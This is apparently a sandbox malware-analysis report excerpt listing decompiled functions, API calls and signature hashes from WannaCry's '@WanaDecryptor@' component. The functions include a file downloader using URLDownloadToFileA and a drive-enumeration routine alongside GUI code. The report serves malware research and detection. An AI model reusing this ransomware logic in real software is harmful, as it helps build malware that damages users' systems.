                                   • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                   • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                   • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #823#825
                                  • String ID:
                                  • API String ID: 89657779-0
                                  • Opcode ID: 1ad6e18a2d076e9d7f2fcb99b27d1d1a93800b7b37bec87adbc1dae2b27ad58d
                                  • Instruction ID: dc1b5eec0fc78afcb49772100b5c76d6e8760601cde25cb5382a27e7a1041640
                                  • Opcode Fuzzy Hash: 1ad6e18a2d076e9d7f2fcb99b27d1d1a93800b7b37bec87adbc1dae2b27ad58d
                                  • Instruction Fuzzy Hash: 8631A5B16006008BDB149F2E8D8169BB6D5FBC4720F18473EF929CB3C1EBB99951C755
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 61%
                                  			E0040B780(signed int __ecx, CHAR* _a4, char* _a8) {
                                  				intOrPtr _v12;
                                  				void _v259;
                                  				char _v260;
                                  				char _v264;
                                  				char _v284;
                                  				char _t15;
                                  				int _t19;
                                  				CHAR* _t25;
                                  				signed int _t26;
                                  				char* _t40;
                                  
                                  				_t26 = __ecx;
                                  				_t25 = _a4;
                                  				CreateDirectoryA(_t25, 0);
                                  				_t40 = _a8;
                                  				asm("repne scasb");
                                  				if( !(_t26 | 0xffffffff) == 1) {
                                  					L4:
                                  					return 0;
                                  				} else {
                                  					_t15 =  *0x421798; // 0x0
                                  					_v260 = _t15;
                                  					memset( &_v259, 0, 0x40 << 2);
                                  					asm("stosw");
                                  					asm("stosb");
                                  					GetTempFileNameA(_t25, "t", 0,  &_v260);
                                  					_t19 = DeleteUrlCacheEntry(_t40);
                                  					_push(0);
                                  					_push(0);
                                  					_push( &_v264);
                                  					_push(_t40);
                                  					_push(0);
                                  					L004133CE();
                                  					if(_t19 != 0 || E0040B6A0(_t25,  &_v284, _v12) == 0) {
                                  						DeleteFileA( &_v284);
                                  						goto L4;
                                  					} else {
                                  						DeleteFileA( &_v284);
                                  						return 1;
                                  					}
                                  				}
                                  			}














                                  APIs
                                  • CreateDirectoryA.KERNEL32(?,00000000,?,76C53310,0019FA30), ref: 0040B793
                                  • GetTempFileNameA.KERNEL32(?,004214DC,00000000,?), ref: 0040B7D4
                                  • DeleteUrlCacheEntry.WININET(?), ref: 0040B7DB
                                  • URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 0040B7ED
                                  • DeleteFileA.KERNEL32(?), ref: 0040B815
                                  • DeleteFileA.KERNEL32(?), ref: 0040B82C
                                    • Part of subcall function 0040B6A0: CreateDirectoryA.KERNEL32(?,00000000,?,76C53310,00000000,0019FA30), ref: 0040B6B4
                                    • Part of subcall function 0040B6A0: DeleteFileA.KERNEL32(?), ref: 0040B6D9
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                   • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                   • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$Delete$CreateDirectory$CacheDownloadEntryNameTemp
                                  • String ID:
                                  • API String ID: 361195595-0
                                  • Opcode ID: bc206aeca14df8ea71a261a63474c4c6f919be589c915fc96ea8b3c1b6d46284
                                  • Instruction ID: f6bba9489874f0a6e7d9c3b0bbe4d647d3eb1ae806ee8fe5932772f512dcd3e1
                                  • Opcode Fuzzy Hash: bc206aeca14df8ea71a261a63474c4c6f919be589c915fc96ea8b3c1b6d46284
                                  • Instruction Fuzzy Hash: 24112B76100300BBE7209B60DC85FEB379CEBC4321F00C82DF659921D1DB79550987EA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00409A40(signed int* _a4, intOrPtr _a8) {
                                  				intOrPtr _v4;
                                  				intOrPtr* _v24;
                                  				struct tagRECT _v40;
                                  				intOrPtr _v56;
                                  				intOrPtr _v64;
                                  				char _v68;
                                  				intOrPtr _v88;
                                  				intOrPtr _t34;
                                  				void* _t35;
                                  				void* _t53;
                                  				intOrPtr _t56;
                                  
                                  				 *[fs:0x0] = _t56;
                                  				_v40.right = 0;
                                  				_v40.top = 0x41679c;
                                  				_v4 = 0;
                                  				E00409D40( &(_v40.bottom), _a4, _a8);
                                  				OffsetRect( &_v40,  ~( *_a4),  ~(_a4[1]));
                                  				L00412D5E();
                                  				L00413010();
                                  				_t34 =  *_v24;
                                  				_t35 =  *((intOrPtr*)( *( *_a4) + 0x64))(0, 0, _t34,  *((intOrPtr*)(_t34 - 8)),  &_v68, CreateRectRgn(_v40, _v40.top, _v40.right, _v40.bottom), _t53,  *[fs:0x0], E00414220, 0xffffffff);
                                  				L00412D52();
                                  				_v88 = 0x415c00;
                                  				_v56 = 1;
                                  				L00412D52();
                                  				 *[fs:0x0] = _v64;
                                  				return _t35;
                                  			}















                                  APIs
                                  • OffsetRect.USER32(?,?,?), ref: 00409A9B
                                  • CreateRectRgn.GDI32(?,?,?,?), ref: 00409AB5
                                  • #1641.MFC42(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00414220), ref: 00409AC0
                                  • #5781.MFC42(0041679C,00000000), ref: 00409ACC
                                  • #2414.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00414220,000000FF), ref: 00409AEB
                                  • #2414.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00414220,000000FF), ref: 00409B04
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                   • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                   • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #2414Rect$#1641#5781CreateOffset
                                  • String ID:
                                  • API String ID: 2675356817-0
                                  • Opcode ID: 70d65907dd93b2958bf6993a897855ede509dea79e6a3755aa7cf1b2bfcc5a2d
                                  • Instruction ID: 08eaaa51a6c0e03944d0349f6c05153d0be232de021c7e29130ffbf32961e4dd
                                  • Opcode Fuzzy Hash: 70d65907dd93b2958bf6993a897855ede509dea79e6a3755aa7cf1b2bfcc5a2d
                                  • Instruction Fuzzy Hash: 7621E9B5204701AFD304DF14C995FABB7E8EB88B04F108A1DF58697291CB78EC45CB96
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 62%
                                  			E004034A0(void* __ecx) {
                                  				intOrPtr _v0;
                                  				int _v8;
                                  				struct tagRECT _v28;
                                  				intOrPtr _v32;
                                  				intOrPtr _v36;
                                  				char _v40;
                                  				intOrPtr _v48;
                                  				intOrPtr _v72;
                                  				char* _t20;
                                  				int _t23;
                                  				void* _t45;
                                  				intOrPtr _t48;
                                  
                                  				_push(0xffffffff);
                                  				_push(E00413620);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t48;
                                  				_t45 = __ecx;
                                  				GetClientRect( *(__ecx + 0x20),  &_v28);
                                  				_push( *((intOrPtr*)(_t45 + 0xe8)));
                                  				L00412D76();
                                  				_t20 =  &_v40;
                                  				_push(_t20);
                                  				_v8 = 0;
                                  				L00412D70();
                                  				_t23 = PatBlt( *(_v0 + 4), 0, 0, _v28.left - _v36, _v28.top - _v32, 0xf00021);
                                  				_push(_t20);
                                  				L00412D70();
                                  				_v72 = 0x415c00;
                                  				_v40 = 1;
                                  				L00412D52();
                                  				 *[fs:0x0] = _v48;
                                  				return _t23;
                                  			}

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #5789$#2414#283ClientRect
                                  • String ID:
                                  • API String ID: 3728838672-0
                                  • Opcode ID: e98b5bf81114f17ba521e4ef3fa09cb8d98efe28b03220bb61ec6d1cf8ad346c
                                  • Instruction ID: 278ac0b80a8d68711b6ced8a2ef72b48c78586c4dd5442d856e74ad00dc42751
                                  • Opcode Fuzzy Hash: e98b5bf81114f17ba521e4ef3fa09cb8d98efe28b03220bb61ec6d1cf8ad346c
                                  • Instruction Fuzzy Hash: DB113375204741AFC314DF69D985F9BB7E8FB88714F008A1EB55AD3280DB78E8448B55
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 62%
                                  			E00406940(void* __ecx) {
                                  				intOrPtr _v0;
                                  				int _v8;
                                  				struct tagRECT _v28;
                                  				intOrPtr _v32;
                                  				intOrPtr _v36;
                                  				char _v40;
                                  				intOrPtr _v48;
                                  				intOrPtr _v72;
                                  				char* _t20;
                                  				int _t23;
                                  				void* _t45;
                                  				intOrPtr _t48;
                                  
                                  				_push(0xffffffff);
                                  				_push(E00413E30);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t48;
                                  				_t45 = __ecx;
                                  				GetClientRect( *(__ecx + 0x20),  &_v28);
                                  				_push( *((intOrPtr*)(_t45 + 0x824)));
                                  				L00412D76();
                                  				_t20 =  &_v40;
                                  				_push(_t20);
                                  				_v8 = 0;
                                  				L00412D70();
                                  				_t23 = PatBlt( *(_v0 + 4), 0, 0, _v28.left - _v36, _v28.top - _v32, 0xf00021);
                                  				_push(_t20);
                                  				L00412D70();
                                  				_v72 = 0x415c00;
                                  				_v40 = 1;
                                  				L00412D52();
                                  				 *[fs:0x0] = _v48;
                                  				return _t23;
                                  			}

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #5789$#2414#283ClientRect
                                  • String ID:
                                  • API String ID: 3728838672-0
                                  • Opcode ID: 94bfcdd95dccd0665c65ca55dcb9de4da2bf1fb5487f65770e6e71c06e885f3f
                                  • Instruction ID: 6a096d29dde81ab0807628e72033e91f5df492254ff76bbe7bc423a6b66a9ecc
                                  • Opcode Fuzzy Hash: 94bfcdd95dccd0665c65ca55dcb9de4da2bf1fb5487f65770e6e71c06e885f3f
                                  • Instruction Fuzzy Hash: CB113375204741AFC314DF69D985F9BB7E8FB8C714F008A1EB599D3280DB78D8058BA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 62%
                                  			E00404EB0(void* __ecx) {
                                  				intOrPtr _v0;
                                  				int _v8;
                                  				struct tagRECT _v28;
                                  				intOrPtr _v32;
                                  				intOrPtr _v36;
                                  				char _v40;
                                  				intOrPtr _v48;
                                  				intOrPtr _v72;
                                  				char* _t20;
                                  				int _t23;
                                  				void* _t45;
                                  				intOrPtr _t48;
                                  
                                  				_push(0xffffffff);
                                  				_push(E00413870);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t48;
                                  				_t45 = __ecx;
                                  				GetClientRect( *(__ecx + 0x20),  &_v28);
                                  				_push( *((intOrPtr*)(_t45 + 0x6c)));
                                  				L00412D76();
                                  				_t20 =  &_v40;
                                  				_push(_t20);
                                  				_v8 = 0;
                                  				L00412D70();
                                  				_t23 = PatBlt( *(_v0 + 4), 0, 0, _v28.left - _v36, _v28.top - _v32, 0xf00021);
                                  				_push(_t20);
                                  				L00412D70();
                                  				_v72 = 0x415c00;
                                  				_v40 = 1;
                                  				L00412D52();
                                  				 *[fs:0x0] = _v48;
                                  				return _t23;
                                  			}

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #5789$#2414#283ClientRect
                                  • String ID:
                                  • API String ID: 3728838672-0
                                  • Opcode ID: 46ba31fa0516e8aa439e01c94c41dc17825091199510f8b9dc900171e6d2ebb4
                                  • Instruction ID: d163b7983d6ef18c2c490a4321b6073019a727c2a72f1ecd8d9e2d5251008e6b
                                  • Opcode Fuzzy Hash: 46ba31fa0516e8aa439e01c94c41dc17825091199510f8b9dc900171e6d2ebb4
                                  • Instruction Fuzzy Hash: CB113375204701AFC314DF69D985F9BB7E8FB88714F008A1EB599D3280DB78D8058B55
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 76%
                                  			E00404310(void* __ecx) {
                                  				intOrPtr _v8;
                                  				intOrPtr _v40;
                                  				intOrPtr _v48;
                                  				void* _v96;
                                  				void* _v100;
                                  				void* _v104;
                                  				void* _v108;
                                  				intOrPtr _v112;
                                  				void* _v128;
                                  				void* _v132;
                                  				void* _t20;
                                  				void* _t22;
                                  				void* _t39;
                                  				intOrPtr _t40;
                                  				intOrPtr _t42;
                                  
                                  				_push(0xffffffff);
                                  				_push(E004137A8);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t42;
                                  				_t39 = __ecx;
                                  				if( *((intOrPtr*)(__ecx + 0x58)) == 0) {
                                  					E004044C0(__ecx, 0);
                                  				}
                                  				L00412DD0();
                                  				_t20 = _t39 + 0x48;
                                  				_v8 = 0;
                                  				L00412DCA();
                                  				L00412DC4();
                                  				L00412DBE();
                                  				_t40 =  *((intOrPtr*)(_t39 + 0x40));
                                  				_t22 =  *((intOrPtr*)(_v112 + 0x64))(0, 0, _t40,  *((intOrPtr*)(_t40 - 8)),  *((intOrPtr*)(_t39 + 0x64)), 1, _t20, _t39);
                                  				_push(_t20);
                                  				L00412DCA();
                                  				_v40 = 0xffffffff;
                                  				L00412DB8();
                                  				 *[fs:0x0] = _v48;
                                  				return _t22;
                                  			}

                                  APIs
                                  • #470.MFC42(?,00000000), ref: 0040433F
                                  • #5789.MFC42 ref: 00404354
                                  • #5875.MFC42(00000001), ref: 00404361
                                  • #6172.MFC42(?,00000001), ref: 0040436E
                                  • #5789.MFC42(00000000), ref: 0040438F
                                  • #755.MFC42(00000000), ref: 004043A0
                                    • Part of subcall function 004044C0: GetParent.USER32(?), ref: 004044D2
                                    • Part of subcall function 004044C0: #2864.MFC42(00000000), ref: 004044D9
                                    • Part of subcall function 004044C0: SendMessageA.USER32(?,00000031,00000000,00000000), ref: 004044E8
                                    • Part of subcall function 004044C0: #2860.MFC42(00000000), ref: 004044EF
                                    • Part of subcall function 004044C0: GetObjectA.GDI32(?,0000003C,?), ref: 00404503
                                    • Part of subcall function 004044C0: CreateFontIndirectA.GDI32(?), ref: 00404513
                                    • Part of subcall function 004044C0: #1641.MFC42(00000000), ref: 0040451D
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #5789$#1641#2860#2864#470#5875#6172#755CreateFontIndirectMessageObjectParentSend
                                  • String ID:
                                  • API String ID: 3301245081-0
                                  • Opcode ID: cf1f65109254071a6a46f66f86cff4d395b2f690d68131f85178f7e4ade46d7e
                                  • Instruction ID: 67bcf298962d36d7fa18f20cd84a87d7b1dd540c5c31f1d51ecab4020f7c2e08
                                  • Opcode Fuzzy Hash: cf1f65109254071a6a46f66f86cff4d395b2f690d68131f85178f7e4ade46d7e
                                  • Instruction Fuzzy Hash: 4611CE71104300AFC310EF14D841FDAB7A4EF94724F008A1EF5A6932D0CBB8A484CB62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 46%
                                  			E00403EB0(void* __eax, void* __ecx, intOrPtr _a4) {
                                  				intOrPtr _t9;
                                  
                                  				_t9 = _a4;
                                  				_push(_t9);
                                  				_push(0x407);
                                  				L00412CE6();
                                  				L00412D88();
                                  				_push(_t9);
                                  				_push(0x408);
                                  				L00412CE6();
                                  				L00412D88();
                                  				_push(_t9);
                                  				_push(2);
                                  				L00412CE6();
                                  				L00412D88();
                                  				return __eax;
                                  			}

                                  APIs
                                  • #3092.MFC42(00000407,00000000,?,?,00403916,00000000), ref: 00403EBE
                                  • #2642.MFC42(00000407,00000000,?,?,00403916,00000000), ref: 00403EC5
                                  • #3092.MFC42(00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403ED2
                                  • #2642.MFC42(00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403ED9
                                  • #3092.MFC42(00000002,00000000,00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403EE3
                                  • #2642.MFC42(00000002,00000000,00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403EEA
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #2642#3092
                                  • String ID:
                                  • API String ID: 2547810013-0
                                  • Opcode ID: e7ddd79a8d322918c2dba81477a0c723ed6b3b7cf26a0e59a3b85b9555a4b9c5
                                  • Instruction ID: 4bb7b71439f2442b6829c2e1ec9f7e71f44d4abaae38a5a684cddd693ffb540b
                                  • Opcode Fuzzy Hash: e7ddd79a8d322918c2dba81477a0c723ed6b3b7cf26a0e59a3b85b9555a4b9c5
                                  • Instruction Fuzzy Hash: 46D0ECB179425427D9543273AE1BD9F4959AFE1B15B10052FB301EB2C2ECFC58A282AD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00403A20(intOrPtr _a4, intOrPtr _a8) {
                                  				union _ULARGE_INTEGER _v8;
                                  				union _ULARGE_INTEGER _v16;
                                  				intOrPtr _v20;
                                  				union _ULARGE_INTEGER _v24;
                                  				short _v28;
                                  				short _v32;
                                  				short _t23;
                                  				short _t34;
                                  				signed int _t47;
                                  				unsigned int _t50;
                                  
                                  				if( *((intOrPtr*)(_a8 + 8)) != 0) {
                                  					return 1;
                                  				} else {
                                  					_t50 = GetLogicalDrives();
                                  					_t47 = 2;
                                  					do {
                                  						if((_t50 >> _t47 & 0x00000001) != 0) {
                                  							_t23 =  *L" : "; // 0x3a0020
                                  							_t34 =  *0x420760; // 0x20
                                  							_v32 = _t23;
                                  							_t7 = _t47 + 0x41; // 0x43
                                  							_v28 = _t34;
                                  							_v32 = _t7;
                                  							_v28 = 0x5c;
                                  							if(GetDriveTypeW( &_v32) != 5 && GetDiskFreeSpaceExW( &_v32,  &_v8,  &_v24,  &_v16) != 0 && (_v20 > 0 || _v24.LowPart > 0)) {
                                  								_v28 = 0;
                                  								E004026B0(_a4,  &_v32);
                                  							}
                                  						}
                                  						_t47 = _t47 + 1;
                                  					} while (_t47 <= 0x19);
                                  					return 1;
                                  				}
                                  			}

                                  APIs
                                  • GetLogicalDrives.KERNEL32 ref: 00403A35
                                  • GetDriveTypeW.KERNEL32 ref: 00403A7A
                                  • GetDiskFreeSpaceExW.KERNEL32(0000005C,?,0000005C,?), ref: 00403A95
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: DiskDriveDrivesFreeLogicalSpaceType
                                  • String ID: : $\
                                  • API String ID: 222820107-856521285
                                  • Opcode ID: 8d838ba2e6f39d2646f0809dd41db9d52f5210801079b522eea1ca76c3ac80bf
                                  • Instruction ID: 7a2fb974cbacd17fa61847377d7cab912bc040039a87a27a6beb81165ce83d4b
                                  • Opcode Fuzzy Hash: 8d838ba2e6f39d2646f0809dd41db9d52f5210801079b522eea1ca76c3ac80bf
                                  • Instruction Fuzzy Hash: 2D116D31614301ABD315DF15D884AABBBE8FBC8710F04882EF88597290E775E948CB9A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 89%
                                  			E00406EF0(void* __ecx, char* _a4, void** _a8) {
                                  				char* _v4;
                                  				char _v8;
                                  				void* _v12;
                                  				char* _t14;
                                  				char _t15;
                                  				char* _t17;
                                  				struct HWND__* _t18;
                                  				char _t23;
                                  
                                  				_t14 = _a4;
                                  				if(_t14[0xc] != 0x201) {
                                  					L5:
                                  					 *_a8 = 0;
                                  					return _t14;
                                  				}
                                  				_t23 = _t14[0x18];
                                  				_t15 = _t14[0x1c];
                                  				_v8 = _t15;
                                  				_t17 = _t15 - _t23 + 1;
                                  				_v12 = _t23;
                                  				_push(_t17);
                                  				L00412CEC();
                                  				_v4 = _t17;
                                  				if(_t17 != 0) {
                                  					_t18 = __ecx + 0x4c0;
                                  					if(_t18 != 0) {
                                  						_t18 =  *(_t18 + 0x20);
                                  					}
                                  					SendMessageA(_t18, 0x44b, 0,  &_v12);
                                  					ShellExecuteA(0, "open", _v4, 0, 0, 5);
                                  					_t14 = _v4;
                                  					_push(_t14);
                                  					L00412C98();
                                  					goto L5;
                                  				}
                                  				return _t17;
                                  			}

                                  APIs
                                  • #823.MFC42(?), ref: 00406F15
                                  • SendMessageA.USER32(?,0000044B,00000000,?), ref: 00406F3F
                                  • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000005), ref: 00406F57
                                  • #825.MFC42(?), ref: 00406F62
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #823#825ExecuteMessageSendShell
                                  • String ID: open
                                  • API String ID: 1093558810-2758837156
                                  • Opcode ID: fd047fd9ae49066b11ca0bfdd1a15bae3696c59196635434c28e1a6aef66c3a1
                                  • Instruction ID: 5f9a2cd0b307edef7ddb37fa3a9b8e73568683458afc550aac563bbb23be8fd8
                                  • Opcode Fuzzy Hash: fd047fd9ae49066b11ca0bfdd1a15bae3696c59196635434c28e1a6aef66c3a1
                                  • Instruction Fuzzy Hash: 0C0148B0A50301AFE610DF24DD4AF5B77E8AB84B14F00C42AF9499B291E6B4E814CB96
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 67%
                                  			E004030E0(intOrPtr __ecx, intOrPtr _a4) {
                                  				char _v12;
                                  				intOrPtr _v16;
                                  				intOrPtr _v20;
                                  				intOrPtr _t30;
                                  
                                  				_push(0xffffffff);
                                  				_push(E004135B3);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t30;
                                  				_push(__ecx);
                                  				_push(_a4);
                                  				_push(0x8a);
                                  				_v16 = __ecx;
                                  				L00412C92();
                                  				_v12 = 0;
                                  				L00412C8C();
                                  				 *((intOrPtr*)(__ecx + 0x60)) = 0x415b28;
                                  				_v12 = 1;
                                  				L00412C8C();
                                  				 *((intOrPtr*)(__ecx + 0xa0)) = 0x415a58;
                                  				 *((intOrPtr*)(__ecx + 0xe4)) = 0;
                                  				 *((intOrPtr*)(__ecx + 0xe0)) = 0x415a44;
                                  				 *((intOrPtr*)(__ecx + 0xf0)) = 0;
                                  				 *((intOrPtr*)(__ecx + 0xec)) = 0x415a30;
                                  				 *((intOrPtr*)(__ecx)) = 0x415958;
                                  				 *((intOrPtr*)(__ecx + 0xf4)) = 0;
                                  				 *[fs:0x0] = _v20;
                                  				return __ecx;
                                  			}








                                  APIs
                                  • #324.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403109
                                  • #567.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403119
                                  • #567.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403131
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
